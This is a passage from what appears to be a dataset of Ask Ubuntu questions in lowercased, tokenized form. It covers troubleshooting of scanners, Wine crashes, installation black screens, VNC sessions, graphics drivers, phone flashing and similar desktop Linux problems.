/lib/udev/rules.d/40-libsane.rules env { devtype } == '' usb_device '' , mode= '' 0664 '' , owner= '' root '' , group= '' saned '' however , i can not actually scan : whatever tool i try , i get the following error : $ scanimage -t scanimage : open of device brother4 : net1 ; dev0 failed : invalid argument this happens both as normal user and when using sudo , so it should n't be a permission problem . what am i missing ? update 1 : now with some more verbose debug output : # sane_debug_brother4=255 scanimage [ sanei_debug ] setting debug level of brother4 to 255 . [ brother4 ] brother init [ brother4 ] brother version : 1000001 [ brother4 ] starting bus scan [ brother4 ] scanning bus 005 [ brother4 ] found dev 0483/2016 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 004 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 003 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 002 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 001 [ brother4 ] found dev 18a5/0302 [ brother4 ] found dev 1d6b/0002 scanimage : open of device brother4 : net1 ; dev0 failed : invalid argument update 2 : i now also tried using the scanner via usb . i get the same error ( `` invalid argument '' ) , but at a later point in the scanning process : # sane_debug_brother4=255 scanimage -t [ sanei_debug ] setting debug level of brother4 to 255 . [ brother4 ] brother init [ brother4 ] brother version : 1000001 [ brother4 ] starting bus scan [ brother4 ] scanning bus 005 [ brother4 ] found dev 0483/2016 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 004 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 003 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 002 [ brother4 ] found dev 1d6b/0001 [ brother4 ] scanning bus 001 [ brother4 ] found dev 04f9/02ce [ brother4 ] found dev 1d6b/0002 scanimage : rounded value of br-x from 215.9 to 215.88 scanimage : rounded value of br-y from 355.6 to 355.567 scanimage : sane_start : invalid argument [ brother4 ] cancel called ... a brother scanner faq mentions that this could be due to the scanning area being to small , but passing -x 100 -y 100 to scanimage does n't change anything . i also tried to explicitly pass all other arguments that scanimage -h returned for the scanner , but without success . installing libsane-extras , as suggested here did not change anything . following the troubleshooting of a similar problem , i 've run # strace -o strace.out -f scanimage -t at the end of the output , there 's the following : 4019 ioctl ( 151 , usbdevfs_submiturb or usbdevfs_submiturb32 , 0xbfbfe0a8 ) = -1 enoent ( no such file or directory ) 4019 gettimeofday ( { 1387487538 , 170759 } , null ) = 0 4019 ioctl ( 151 , usbdevfs_submiturb or usbdevfs_submiturb32 , 0xbfbfe0a8 ) = -1 enoent ( no such file or directory ) 4019 gettimeofday ( { 1387487538 , 170926 } , { 4294967236 , 0 } ) = 0 4019 gettimeofday ( { 1387487538 , 171013 } , { 4294967236 , 0 } ) = 0 4019 gettimeofday ( { 1387487538 , 171104 } , null ) = 0 4019 ioctl ( 151 , usbdevfs_submiturb or usbdevfs_submiturb32 , 0xbfbfe068 ) = -1 enoent ( no such file or directory ) 4019 write ( 2 , `` scanimage : sane_start : invalid a '' ... , 40 ) = 40 4019 ioctl ( 151 , usbdevfs_control or usbdevfs_control32 , 0xbfbfe2e0 ) = 5 4019 ioctl ( 151 , usbdevfs_releaseinterface , 0xbfbfe304 ) = 0 4019 semop ( 1245186 , { { 0 , 1 , sem_undo } } , 1 ) = 0 4019 semctl ( 1245186 , 0 , ipc_64|ipc_rmid , 0xbfbfe2b8 ) = 0 4019 close ( 151 ) = 0 4019 munmap ( 0xb755a000 , 134532 ) = 0 4019 munmap ( 0xb7525000 , 104424 ) = 0 4019 munmap ( 0xb751b000 , 38084 ) = 0 4019 munmap ( 0xb74ef000 , 176256 ) = 0 4019 exit_group ( 4 ) = ? the whole log is full of ioctl calls referring to usbdefvs_submiturb and getting a no such file or directory . however i do n't know enough about the linux usb internals to make sense of that . update 3 : my kernel : # uname -r 3.2.0-57-generic-pae relevant output from dmesg : [ 10210.399432 ] usb 1-1 : usbfs : interface 0 claimed by usblp while 'scanimage ' sets config # 1 [ 10210.399446 ] usb 1-1 : usbfs : process 5347 ( scanimage ) did not claim interface 1 before use [ 10211.428906 ] usb 1-1 : usbfs : interface 0 claimed by usblp while 'scanimage ' sets config # 1 [ 10213.519554 ] usb 1-1 : usbfs : interface 0 claimed by usblp while 'scanimage ' sets config # 1 [ 10213.519567 ] usb 1-1 : usbfs : process 5352 ( scanimage ) did not claim interface 1 before use [ 10214.549025 ] usb 1-1 : usbfs : interface 0 claimed by usblp while 'scanimage ' sets config # 1
392315	wine crashes when i launch steam	when i start steam in wine , i see the log in screen , or if i have logged in already - the connecting account popup , i see this : ntdll elf 7bcd0000-7bcfc000 deferred wine unhandled exception : page fault on write access to 0x00000000 in 32-bit code ( 0x7bc51b48 ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:7bc51b48 esp:0705b2cc ebp:0705b3b4 eflags:00210216 ( r- -- i -a-p- ) eax:0000000c ebx:7bca6ff4 ecx:00000000 edx:00000010 esi:0705b408 edi:00000000 stack dump : 0x0705b2cc : 0705b328 0705b320 7bc46923 00000030 0x0705b2dc : 00000000 0705b320 7bc68453 f777d6a0 0x0705b2ec : 00000000 3868af94 00000028 001b9a28 0x0705b2fc : 00110000 00000010 7bc3512f 0705b418 0x0705b30c : 00000000 0000035c 00000000 00110000 0x0705b31c : 7bca6ff4 0705b380 7bc472f3 00000000 backtrace : = > 0 0x7bc51b48 ntadjustprivilegestoken+0xf8 ( ) in ntdll ( 0x0705b3b4 ) 1 0x7ea03a4b adjusttokenprivileges+0x4a ( ) in advapi32 ( 0x0705b3e4 ) 2 0x3823574e in steamclient ( +0x23574d ) ( 0x0705b430 ) 3 0x38236284 in steamclient ( +0x236283 ) ( 0x0705b708 ) 4 0x381e9739 in steamclient ( +0x1e9738 ) ( 0x0705b770 ) 5 0x381eb712 in steamclient ( +0x1eb711 ) ( 0x0705b7a4 ) 6 0x380ef0d9 in steamclient ( +0xef0d8 ) ( 0x0705b90c ) 7 0x380efd3c in steamclient ( +0xefd3b ) ( 0x0705cad0 ) 8 0x3845e818 in steamclient ( +0x45e817 ) ( 0x0705cbe8 ) 9 0x3845f140 in steamclient ( +0x45f13f ) ( 0x0705cc38 ) 10 0x380efba6 in steamclient ( +0xefba5 ) ( 0x0705de00 ) 11 0x3849ddc7 in steamclient ( +0x49ddc6 ) ( 0x0705e210 ) 12 0x3849dfe4 in steamclient ( +0x49dfe3 ) ( 0x0705e224 ) 13 0x384506d9 in steamclient ( +0x4506d8 ) ( 0x0705e448 ) 14 0x3841cbf3 in steamclient ( +0x41cbf2 ) ( 0x0705e46c ) 15 0x3846249c in steamclient ( +0x46249b ) ( 0x0705e478 ) 16 0x38462123 in steamclient ( +0x462122 ) ( 0x0705e504 ) 17 0x3819af12 in steamclient ( +0x19af11 ) ( 0x0705e574 ) 18 0x3819b060 in steamclient ( +0x19b05f ) ( 0x0705e588 ) 19 0x3f00ca4f in tier0_s ( +0xca4e ) ( 0x0705e5b8 ) 20 0x3f00db0c in tier0_s ( +0xdb0b ) ( 0x0705e5dc ) 21 0x3f011b70 in tier0_s ( +0x11b6f ) ( 0x0705ea18 ) 22 0x7bc71db0 call_thread_func_wrapper+0xb ( ) in ntdll ( 0x0705ea28 ) 23 0x7bc7486d call_thread_func+0x7c ( ) in ntdll ( 0x0705eaf8 ) 24 0x7bc71d8e rtlraiseexception+0x21 ( ) in ntdll ( 0x0705eb18 ) 25 0x7bc7a748 in ntdll ( +0x6a747 ) ( 0x0705f368 ) 26 0xf7616d4c start_thread+0xcb ( ) in libpthread.so.0 ( 0x0705f468 ) 0x7bc51b48 ntadjustprivilegestoken+0xf8 in ntdll : movl % edx,0x0 ( % edi ) modules : module address debug info name ( 179 modules ) pe 400000- 63d000 deferred steam pe 12d0000- 1387000 deferred sdl2 pe 45d0000- 46ea000 deferred chromehtml pe 46f0000- 5acb000 deferred libcef pe 7060000- 736d000 deferred steamservice pe 10000000-100b4000 deferred crashhandler pe 30000000-302c1000 deferred steam pe 38000000-38881000 export steamclient pe 3a000000-3aaf4000 deferred steamui pe 3f000000-3f0ac000 export tier0_s pe 3f200000-3f2b1000 deferred vgui2_s pe 3f600000-3f64b000 deferred vstdlib_s pe 3f800000-3f82e000 deferred filesystem_stdio pe 4ad00000-4b67f000 deferred icudt pe 60000000-60021000 deferred cserhelper pe 65ec0000-66072000 deferred avcodec-53 pe 68b80000-68ba7000 deferred avutil-51 pe 6ab00000-6ab33000 deferred avformat-53 elf 78d58000-78ed0000 deferred libvorbisenc.so.2 elf 78ed0000-78f1e000 deferred libflac.so.8 elf 78f20000-78f92000 deferred libsndfile.so.1 elf 78f98000-78ffd000 deferred libpulsecommon-1.1.so elf 79108000-791fa000 deferred libasound.so.2 elf 79328000-7933e000 deferred wbemprox < elf > \-pe 79330000-7933e000 \ wbemprox elf 79340000-79348000 deferred libogg.so.0 elf 79348000-7b7fb000 deferred fglrx_dri.so elf 7b800000-7ba15000 deferred kernel32 < elf > \-pe 7b810000-7ba15000 \ kernel32 elf 7ba18000-7ba43000 deferred libvorbis.so.0 elf 7ba48000-7ba96000 deferred libpulse.so.0 elf 7baa0000-7bab5000 deferred hid < elf > \-pe 7bab0000-7bab5000 \ hid elf 7bab8000-7bafb000 deferred dsound < elf > \-pe 7bac0000-7bafb000 \ dsound elf 7bc00000-7bcc3000 dwarf ntdll < elf > \-pe 7bc10000-7bcc3000 \ alsa < elf > \-pe 7bce0000-7bcfc000 \ winealsa elf 7be08000-7be2b000 deferred mmdevapi < elf > \-pe 7be10000-7be2b000 \ mmdevapi elf 7be30000-7be6e000 deferred rsaenh < elf > \-pe 7be40000-7be6e000 \ rsaenh elf 7be70000-7befd000 deferred msvcrt < elf > \-pe 7be80000-7befd000 \ msvcrt elf 7bf00000-7bf04000 deferred < wine-loader > elf 7bf10000-7bf1a000 deferred libwrap.so.0 elf 7bf20000-7bf3d000 deferred pdh < elf > \-pe 7bf30000-7bf3d000 \ pdh elf 7bf40000-7bf5a000 deferred imagehlp < elf > \-pe 7bf50000-7bf5a000 \ imagehlp elf 7bf60000-7bf98000 deferred usp10 < elf > \-pe 7bf70000-7bf98000 \ usp10 elf 7bf98000-7bfc3000 deferred netapi32 < elf > \-pe 7bfa0000-7bfc3000 \ netapi32 elf 7bfc8000-7c04c000 deferred urlmon < elf > \-pe 7bfd0000-7c04c000 \ urlmon elf 7c050000-7c0b7000 deferred setupapi < elf > \-pe 7c060000-7c0b7000 \ setupapi elf 7c2c0000-7c2c7000 deferred libasyncns.so.0 elf 7c2c8000-7c2d0000 deferred libjson.so.0 elf 7c2d0000-7c2fc000 deferred secur32 < elf > \-pe 7c2e0000-7c2fc000 \ secur32 elf 7c408000-7c40f000 deferred libasound_module_pcm_pulse.so elf 7cf60000-7cfc6000 deferred libatiadlxx.so elf 7cfd0000-7cfe5000 deferred dhcpcsvc < elf > \-pe 7cfe0000-7cfe5000 \ dhcpcsvc elf 7d0e8000-7d101000 deferred libatiuki.so.1 elf 7d108000-7d1f8000 deferred libgl.so.1 elf 7d200000-7d218000 deferred userenv < elf > \-pe 7d210000-7d218000 \ userenv elf 7d218000-7d2d2000 deferred opengl32 < elf > \-pe 7d230000-7d2d2000 \ opengl32 elf 7d2d8000-7d2ec000 deferred msimg32 < elf > \-pe 7d2e0000-7d2ec000 \ msimg32 elf 7d2f0000-7d312000 deferred iphlpapi < elf > \-pe 7d300000-7d312000 \ iphlpapi elf 7d318000-7d333000 deferred spoolss < elf > \-pe 7d320000-7d333000 \ spoolss elf 7d338000-7d341000 deferred librt.so.1 elf 7d348000-7d34d000 deferred libgpg-error.so.0 elf 7d350000-7d399000 deferred libdbus-1.so.3 elf 7d3a0000-7d3b2000 deferred libp11-kit.so.0 elf 7d3b8000-7d43d000 deferred libgcrypt.so.11 elf 7d440000-7d452000 deferred libtasn1.so.3 elf 7d458000-7d480000 deferred libk5crypto.so.3 elf 7d480000-7d54f000 deferred libkrb5.so.3 elf 7d550000-7d614000 deferred libgnutls.so.26 elf 7d6e0000-7d71e000 deferred libgssapi_krb5.so.2 elf 7d720000-7d773000 deferred libcups.so.2 elf 7d778000-7d7b2000 deferred winspool < elf > \-pe 7d780000-7d7b2000 \ winspool elf 7d7b8000-7d897000 deferred comdlg32 < elf > \-pe 7d7c0000-7d897000 \ comdlg32 elf 7d898000-7d950000 deferred crypt32 < elf > \-pe 7d8a0000-7d950000 \ crypt32 elf 7d950000-7d9fd000 deferred winmm < elf > \-pe 7d960000-7d9fd000 \ winmm elf 7dd00000-7dd21000 deferred localspl < elf > \-pe 7dd10000-7dd21000 \ localspl elf 7dd28000-7dd50000 deferred msacm32 < elf > \-pe 7dd30000-7dd50000 \ msacm32 elf 7dd50000-7dd6e000 deferred libgcc_s.so.1 elf 7dd78000-7dd7c000 deferred libkeyutils.so.1 elf 7dd80000-7dd89000 deferred libkrb5support.so.0 elf 7dd90000-7dda8000 deferred libresolv.so.2 elf 7dde8000-7ddfa000 deferred libavahi-client.so.3 elf 7de00000-7de07000 deferred libnss_dns.so.2 elf 7de10000-7de15000 deferred libcom_err.so.2 elf 7de18000-7de26000 deferred libavahi-common.so.3 elf 7de28000-7de60000 deferred winhttp < elf > \-pe 7de30000-7de60000 \ winhttp elf 7de60000-7debe000 deferred dbghelp < elf > \-pe 7de70000-7debe000 \ dbghelp elf 7dec0000-7dee6000 deferred mpr < elf > \-pe 7ded0000-7dee6000 \ mpr elf 7dee8000-7df57000 deferred wininet < elf > \-pe 7def0000-7df57000 \ wininet elf 7df58000-7df6c000 deferred psapi < elf > \-pe 7df60000-7df6c000 \ psapi elf 7df88000-7dfbc000 deferred uxtheme < elf > \-pe 7df90000-7dfbc000 \ uxtheme elf 7dfc0000-7dfc6000 deferred libxfixes.so.3 elf 7dfc8000-7dfd3000 deferred libxcursor.so.1 elf 7e0c0000-7e0ea000 deferred libexpat.so.1 elf 7e0f0000-7e124000 deferred libfontconfig.so.1 elf 7e128000-7e138000 deferred libxi.so.6 elf 7e138000-7e13c000 deferred libxcomposite.so.1 elf 7e140000-7e149000 deferred libxrandr.so.2 elf 7e150000-7e15a000 deferred libxrender.so.1 elf 7e160000-7e166000 deferred libxxf86vm.so.1 elf 7e168000-7e16c000 deferred libxinerama.so.1 elf 7e170000-7e192000 deferred imm32 < elf > \-pe 7e180000-7e192000 \ imm32 elf 7e198000-7e19f000 deferred libxdmcp.so.6 elf 7e1a0000-7e1a4000 deferred libxau.so.6 elf 7e1a8000-7e1c9000 deferred libxcb.so.1 elf 7e1d0000-7e1ea000 deferred libice.so.6 elf 7e1f0000-7e324000 deferred libx11.so.6 elf 7e328000-7e33a000 deferred libxext.so.6 elf 7e360000-7e3f3000 deferred winex11 < elf > \-pe 7e370000-7e3f3000 \ winex11 elf 7e3f8000-7e40e000 deferred libz.so.1 elf 7e410000-7e4aa000 deferred libfreetype.so.6 elf 7e4b0000-7e4b6000 deferred libuuid.so.1 elf 7e4b8000-7e4c1000 deferred libsm.so.6 elf 7e4d0000-7e545000 deferred rpcrt4 < elf > \-pe 7e4e0000-7e545000 \ rpcrt4 elf 7e548000-7e650000 deferred ole32 < elf > \-pe 7e560000-7e650000 \ ole32 elf 7e650000-7e742000 deferred oleaut32 < elf > \-pe 7e670000-7e742000 \ oleaut32 elf 7e748000-7e7b2000 deferred shlwapi < elf > \-pe 7e760000-7e7b2000 \ shlwapi elf 7e7b8000-7e9c9000 deferred shell32 < elf > \-pe 7e7c0000-7e9c9000 \ shell32 elf 7e9d0000-7ea30000 dwarf advapi32 < elf > \-pe 7e9e0000-7ea30000 \ advapi32 elf 7ea30000-7eaed000 deferred gdi32 < elf > \-pe 7ea40000-7eaed000 \ gdi32 elf 7eaf0000-7ec30000 deferred user32 < elf > \-pe 7eb00000-7ec30000 \ user32 elf 7ec30000-7ed28000 deferred comctl32 < elf > \-pe 7ec40000-7ed28000 \ comctl32 elf 7ed28000-7ed5a000 deferred ws2_32 < elf > \-pe 7ed30000-7ed5a000 \ ws2_32 elf 7ed60000-7ed6d000 deferred libnss_files.so.2 elf 7ed70000-7ed8a000 deferred libnsl.so.1 elf 7ed90000-7eda9000 deferred version < elf > \-pe 7eda0000-7eda9000 \ version elf 7efb0000-7efdc000 deferred libm.so.6 elf 7efe0000-7efec000 deferred libnss_nis.so.2 elf 7eff0000-7eff9000 deferred libnss_compat.so.2 elf f7458000-f745d000 deferred libdl.so.2 elf f7460000-f760a000 dwarf libc.so.6 elf f7610000-f762b000 dwarf libpthread.so.0 elf f7650000-f7792000 dwarf libwine.so.1 elf f7798000-f77ba000 deferred ld-linux.so.2 elf f77bc000-f77bd000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 0000001f 0 0000001e 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001c 0 00000019 0 00000014 0 00000013 0 0000001a plugplay.exe 00000020 0 0000001d 0 0000001b 0 00000021 explorer.exe 00000022 0 00000023 ( d ) c : \program files ( x86 ) \steam\steam.exe 0000002c 0 00000009 0 0000000b 0 00000047 0 00000046 0 00000045 0 00000044 0 00000043 0 00000042 0 00000041 0 < == 0000003f 0 0000003e 0 0000003d 0 0000003c 0 0000003b 0 0000003a 0 00000039 0 00000038 0 00000037 0 00000036 0 00000035 0 00000034 0 00000033 0 00000032 0 0000002f 0 0000002b 0 0000002a 0 00000029 0 00000028 0 00000024 0 system information : wine build : wine-1.4 platform : i386 ( wow64 ) host system : linux host version : 3.8.0-34-generic it happened really suddenly , i had steam working in wine perfectly , and i was even able to play portal 2 , then i installed borderlands 2 and it for some reason could n't install some directx package . then i rebooted my computer , and steam on wine did n't work . maybe borderlands broke it or something ? thanks for any help ! specs : ubuntu 12.04 lts ( 64bit ) amd athlon ( tm ) x4 760k quad core processor ă 4 radeon hd 7770 gpu msi fm2-a75ma-e35 ( motherboard ) wine build : wine-1.4
392316	blank screen on server install with a ssd	i 'm trying to install ubuntu server 13.10 on my newly built server . i come to the point where i can choose a language and boot options ( you know the first screen ) . when i hit enter to actually make the install , i get a blank/black screen . my setup : motherboard : supermicro x10sae cpu : intel xeon e3-1275 v3 ( the cpu includes graphics , could be the problem ? ) memory : 16gb ddr3 unbuffered ecc ram ( 2x8gb kingston ) boot hard drive : samsung evo ssd 250gb . storage hard drive : 4x3tb wd red which will be configured as raid10 this will be used as a server virtualization . the ubuntu server i 'm trying to install now is the kvm host . if i just can get passed this , i guess the guests will be easier to install . i can get into bios and things look good . i have tried different boot options like nomodeset , acpi=off . i have turned on and off the uefi in bios . i have tried to install both from a cd and a usb . i have checked the md5sum of the iso-file . so what do you think can be the problem ? i am out of ideas . is there perhaps a conflict with the hardware ? bios settings ? any input is welcome ! i found the problem but the solution was not in the link my computer boots to a black screen , what options do i have to fix it ? which was indicated as a duplicate of the present question . the solution was found in this thread ubuntu 12.04 install - failed : command identify packet device . when i ran the installment in the expert mode i noticed a ata bus error with failed command `` identify packet device '' . it turns out that i had connected both the cd/dvd and the usb to the two sata ports related to asm1061r chipset . it seems that this chip does not understand the atapi commands from the cd/dvd and the usb . i just switch the cd player to another sata port ( intel c226 pch ) and then it was now no problem to install ubuntu server . problem solved thanks to ask ubuntu !
392317	problems upgrading ubuntu 12.10 to 13.04	i 'm trying to upgrade my ubuntu release from 12.10 to 13.04 , having successfully upgraded to 12.10 yesterday . with the intention of then moving to 13.10 . i am up to date with other software updates . using the update manager i am offered to upgrade the release , but this is offering an upgrade to 13.10 instead of the expected 13.04 . when selecting upgrade this does in fact attempt to upgrade to 13.10 'saucy ' , the application tells me off for doing so , rightly so , and sends me away . any ideas how i can upgrade to 13.04 firstly ?
392318	how do i configure mount for my new hard drive ?	i have a new ssd and used gparted to format it to the ext3 filesystem - that went smoothly but now i ca n't access it . i right click on the drive icon in nautilus under `` devices '' and check the permissions - it says that the owner is root and i do n't know how to change that .
392320	i 'd like to use vnc , with the xmonad window manager , at an arbitrary resolution	in order to use an arbitrary resolution ( the resolution of the client ) i 've found that i need to create a new display session ( correct term ? ) . if i use display 0 , i ca n't start a vnc server at any resolution because the connected display only has a few modes , and none of them are the same as my client 's resolution . so , in order to start a vnc server that creates a new session , i use the following command to start tightvnc : vncserver :12 -name `` myserver '' -geometry 1440x900 and i have a file at ~/.vnc/xstartup with the contents : xmonad & when i connect to the server remotely , it creates a new session , but as far as i can tell , it does not run xmonad . what i get is a window with a resolution of 1440x900 , filled with a black and white cross-hatch pattern , and with an x for a cursor . no input seems to have any effect . the content 's of the relevant tightvnc log file are as follows 17/12/13 15:20:28 xvnc version tightvnc-1.3.9 17/12/13 15:20:28 copyright ( c ) 2000-2007 tightvnc group 17/12/13 15:20:28 copyright ( c ) 1999 at & t laboratories cambridge 17/12/13 15:20:28 all rights reserved . 17/12/13 15:20:28 see http : //www.tightvnc.com/ for information on tightvnc 17/12/13 15:20:28 desktop name 'myserver ' ( glock:12 ) 17/12/13 15:20:28 protocol versions supported : 3.3 , 3.7 , 3.8 , 3.7t , 3.8t 17/12/13 15:20:28 listening for vnc connections on tcp port 5912 xlib : extension `` xinerama '' missing on display `` :12 '' . 17/12/13 15:20:46 got connection from client 127.0.0.1 17/12/13 15:20:46 using protocol version 3.8 17/12/13 15:20:46 full-control authentication passed by 127.0.0.1 17/12/13 15:20:46 pixel format for client 127.0.0.1 : 17/12/13 15:20:46 32 bpp , depth 24 , little endian 17/12/13 15:20:46 true colour : max r 255 g 255 b 255 , shift r 16 g 8 b 0 17/12/13 15:20:46 no translation needed 17/12/13 15:20:46 rfbprocessclientnormalmessage : ignoring unknown encoding 16 17/12/13 15:20:46 using tight encoding for client 127.0.0.1 17/12/13 15:20:46 using image quality level 6 for client 127.0.0.1 17/12/13 15:20:46 rfbprocessclientnormalmessage : ignoring unknown encoding 8 17/12/13 15:20:46 rfbprocessclientnormalmessage : ignoring unknown encoding -307 17/12/13 15:20:46 enabling lastrect protocol extension for client 127.0.0.1 17/12/13 15:20:46 rfbprocessclientnormalmessage : ignoring unknown encoding -223 17/12/13 15:20:46 enabling cursor position updates for client 127.0.0.1 17/12/13 15:20:46 enabling full-color cursor updates for client 127.0.0.1 17/12/13 15:20:54 client 127.0.0.1 gone 17/12/13 15:20:54 statistics : 17/12/13 15:20:54 key events received 18 , pointer events 24 17/12/13 15:20:54 framebuffer updates 1 , rectangles 23 , bytes 2840 17/12/13 15:20:54 lastrect markers 1 , bytes 12 17/12/13 15:20:54 cursor shape updates 1 , bytes 684 17/12/13 15:20:54 cursor position updates 1 , bytes 12 17/12/13 15:20:54 tight rectangles 20 , bytes 2132 17/12/13 15:20:54 raw bytes equivalent 5184012 , compression ratio 2431.525328 xio : fatal io error 4 ( interrupted system call ) on x server `` :12 '' after 271 requests ( 271 known processed ) with 0 events remaining . as for any errors that might have been produced when ~/.vnc/xstartup was run , i do n't know where to find them .
392323	install citrix online plug-in on ubuntu	i need your support as i 'm trying to install citrix online plug-in on ubuntu which is different from citrix receiver but i 've failed with all my trials so far . the below link is for the official .exe source , and i ca n't find any debian extension or any other ubuntu compatible extension for the online plug-in software , i 've tried to use wine application but it gave me errors https : //www.citrix.com/downloads/citrix-receiver/legacy-client-software/online-plug-in-123.html so is there any other alternative software that could do the same functions or is there any way i could install this program . thanks in advance .
392329	atheros ar9285 wireless , does n't associate	i have continuing trouble with my wifi . it still connect - disconnect - connect ... etc . in unperiodic intervals 1-3 minutes . my hw : lenovo ideapad g575 , qualcomm atheros ar9285 wireless network adapter ( pci-express ) hard blocked : no i tried also blacklist acer-wmi nothing . still disconnected - connected - disconnected ... in w7 it works without troubles . could n't be bad driver ? official lenovo support offer only win drivers .
392330	scroll unfocused window under mouse	in os x , when you scroll with the mouse wheel/trackpad , the window that get’s scrolled is the one under the mouse , even if inactive , not necessarily the focused one . something like wizmouse on windows , it seems . how can i achieve the same in “vanilla” ubuntu ( gnome ) ?
392332	ca n't select supported max . resolution with hdmi ubuntu 13.10 amd card	i 've got an amd graphics card ( 6900 series ) and just installed the beta driver ( after fighting with the stable one ) . i 'm also using a screen with 2560x1440 resolution connected via hdmi which works fine on windows ( so i assume there is nothing wrong with the screen itself ) but not on ubuntu . the maximum resolution i can select is 1920x1080 which looks ugly . however , i can use 2560x1440 with dvi but i use the built in speakers via hdmi so i 'd like to keep that . i 've tried to use xrandr to basically fake it but xrandr ca n't find a hdmi output i could add the new mode to . my os is freshly installed except for the driver . thanks
392333	how to use the ubuntu one client to sync different folders to different accounts	my friends and i have ubuntu one accounts that we use personally and we also have an account that we all share the login details for which we use for sharing music . what would be amazing is if we could just sync our music folder under our home folder to the account we share and have our personal accounts sync to the ubuntu one folder . that way we would n't need to log in to the ubuntu one website and we could share music through the desktop client . is there any way to do this ?
392334	netboot and install from internet	i am trying to do this , like the title says . i have retrieved the 2 necessary files and placed them in /boot then i rebooted , went into grub2 now however , i am not getting grub to recognise the paths . or else i am doing something really wrong : as i said , i have booted into grub2 , having previously placed both files inside /boot so , the syntax for me in steps 2 and 3 should be : linux /boot/linux and initrd /boot/initrd.gz . but i am getting 'no such partition' i am missing something obvious.. but what ? help , as always , would be appreciated cheers
392335	there is something similar to mailtab for ubuntu ?	i was using mac os for some days and this app ( mailtab ) is really usefull : http : //screenshots.en.sftcdn.net/en/scrn/317000/317480/mailtab-for-gmail-5.jpg anyone know anything similar ?
392336	no visible performance increase with radeon 5450 and osource drivers	i have been running my machine without gpu for a while with decent results ( no lag for a decent internet use , videos read smoothly and 2d gaming is ok ) . but i decided to see what i could get with an actual gpu , and acquired a cheap radeon 5450 low profile card from a local store , just to try it out . ( a picture here for the record i know it 's not much but that 's just for testing . ) after installing the open source drivers , i can see absolutely no difference performance-wise . benchmarking tools showed results in the very low end , and games run with very bad performances , not anything near what such gpu should allow . overall it all feels like the gpu is n't computing anything . this is a fresh install with no history of other drivers . is it something with the card ( though i can read here it is supposedly supported https : //help.ubuntu.com/community/radeondriver ) or else ? configuration : cpu intelâž pentium ( r ) cpu g2020 @ 2.90ghz ă 2 ram : 8go os : ubuntu 12.04 64 bit gpu : intel radeon hd5450 opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd cedar opengl version string : 2.1 mesa 8.0.4 opengl shading language version string : 1.20
392337	system hangs installing 13.10 with amd r9 290x graphics card	trying to install ubuntu 13.10 ( saucy salamander ) on a new desktop pc with an amd r9 290x graphics card hangs on the 'dots ' screen . all the dots light up but nothing happens . how do i resolve this ?
392345	can not operate amazon videos anymore	i purchased a system 76 laptop , stock with ubuntu 13.10 ( beautiful machine ) but i can no longer operate amazon videos , and nothing i try seems to fix it ! since i 've gone through all the threads to try to get hal , install .debs , etc . i just get one dead end after another , and an older version of adobe flash player wo n't seem to install .
392347	how to sell music in ubuntu one ?	how do i go about selling music in the ubuntu one music store ? i have some clients that are interested in putting their catalog for sale on ubuntu one .
392349	can not get the move window to workspace command to work through shortcuts	i want to move windows between workspaces using shift+alt+numbers ( eg shift alt 1 ) but in the shortcuts setting this is being written as shift+alt+ ! , shift+alt+ @ , etc ... so once i try to use these shortcuts , it does not work . is there any workaround for this ? edit : what is not working is the command `` move window to workspace x '' . it is not the shortcut combination that does not work . thanks !
392350	after running command , `` phablet-flash ubuntu-system -- no-backup '' responds : `` unsupported device ''	i want to try the new ubuntu system for android phones . the step by step goes as said on the web page http : //www.ubuntu.com/phone/install everything ran smoothly until i ran the command : phablet-flash ubuntu-system -- no-backup i received the message , warning : phablet-flash : -- no-backup is depreciated , use -- bootstrap instead info : phablet-flash : device detected as sanstar15_ics2 error : phablet-flash : unsupported device , autodetect fails device i received this phone from my grandmother , which i know has homebrew elements to it which the previous owner , before my grandmother , has obviously added to the device . so i figured to remove the previous system on it and add a different system to it . i saw how the ubuntu edge is out for testing and this phone would prove to be a great test subject . i believe that the phone is probably made by someone who is not a major company , such as samsung , and the phone may or may not be up to par . when i open the phone 's build.prop , to my surprise i find this : ro.build.type=user ro.build.user=root ro.build.host=ubuntu ro.build.tags=test-keys ro.product.model=gt-n7100 ro.product.brand=samsung ro.product.name=sanstar15_ics2 ro.product.device=sanstar15_ics2 ro.product.board=sanstar15_ics2 ro.product.cpu.abi=armeabi-v7a ro.product.cpu.abi2=armeabi ro.product.manufacturer=samsung ro.product.locale.language=en ro.product.locale.region=us i think this tells me that the creator of this phone may have been just creating a fake phone ? and the part where it says ro.build.host=ubuntu is the system on it really ubuntu ? i have so many questions and i await a response . edit ok . so it 's not supported ... but there are many elements i have questions for . first off , the phone has a setting to choose from which of the two sim cards to use . and then the prop editor built into it can make the phone say it 's something that its not . such as swapping the build.prop with the prop of another device , by just bluetooth detection . it has an extended antenna that sticks out for extended range , i 'm assuming . it has 16gb of space . it has a separate memory space for the system . it even has 2gigs of swap that is n't on the 16 gigs of space . the screen resolution sucks and the camera sucks too . but the cpu power is crazy . it claims it has 1.5ghz and 1024mb of ram . i could run three game boys and game link them via bluetooth to this phone as the server while using bluetooth connection to a wiimote for a controller while running spotify . it has 2 headphone jacks and 2 mini usb ports . one port is in plain sight while the other is underneath the battery cover . it is an interesting thing sent by my pantech flex , p8010
392358	decompiling and reverse engineer a windows program to run on linux	i 've made use of a very powerful firewall on windows xp for some time . i like it 's capabilitys in giving me information on the intruder as well , it constantly sniffs the activitys of all active programs to find malitious activity and scripts . the fire wall is blackice and i love it . what i 'm looking to have answered is what do you use to decompile a windows program with ubuntus distro and how do i identify the windows portion and give it a new language to perform the same function on linux ? to also , a definition or a point in the direction to what legalitys would be found with such a performance .
